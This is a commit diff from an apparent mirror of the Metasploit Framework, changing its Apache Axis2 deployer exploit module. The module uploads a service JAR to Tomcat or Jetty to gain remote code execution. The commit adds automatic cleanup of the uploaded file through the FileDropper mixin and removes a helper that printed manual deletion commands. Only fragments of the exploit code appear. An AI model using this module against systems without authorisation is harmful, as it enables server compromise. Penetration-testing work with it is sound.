mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Land #6457, FileDropper for axis2_deployer
This commit is contained in:
commit
fec75c1daa
@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
@ -74,6 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def upload_exec(session,rpath)
|
||||
contents=''
|
||||
name = Rex::Text.rand_text_alpha(8)
|
||||
|
||||
# We must register this file early, that way the on_new_session method
|
||||
# won't miss it if FileDropper's cleanup routine kicks in.
|
||||
register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
|
||||
|
||||
services_xml = %Q{
|
||||
<service name="#{name}" scope="application">
|
||||
<description>
|
||||
@ -215,7 +221,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
if res and res.code > 200 and res.code < 300
|
||||
cleanup_instructions(rpath, name) # display cleanup info
|
||||
throw :stop # exit loop
|
||||
elsif res and res.code == 401
|
||||
if (res.headers['WWW-Authenticate'])
|
||||
@ -225,7 +230,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
if authmsg
|
||||
print_error("WWW-Authenticate: %s" % authmsg)
|
||||
end
|
||||
cleanup_instructions(rpath, name) # display cleanup info
|
||||
raise ::Rex::ConnectionError
|
||||
throw :stop # exit loop
|
||||
end
|
||||
@ -236,19 +240,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup_instructions(rpath, name)
|
||||
print_line("")
|
||||
print_status("NOTE: You will need to delete the web service that was uploaded.")
|
||||
print_line("")
|
||||
print_status("Using meterpreter:")
|
||||
print_status("rm \"webapps#{rpath}/WEB-INF/services/#{name}.jar\"")
|
||||
print_line("")
|
||||
print_status("Using the shell:")
|
||||
print_status("cd \"webapps#{rpath}/WEB-INF/services\"")
|
||||
print_status("del #{name}.jar")
|
||||
print_line("")
|
||||
end
|
||||
|
||||
def exploit
|
||||
user = datastore['USERNAME']
|
||||
pass = datastore['PASSWORD']
|
||||
|
Loading…
Reference in New Issue
Block a user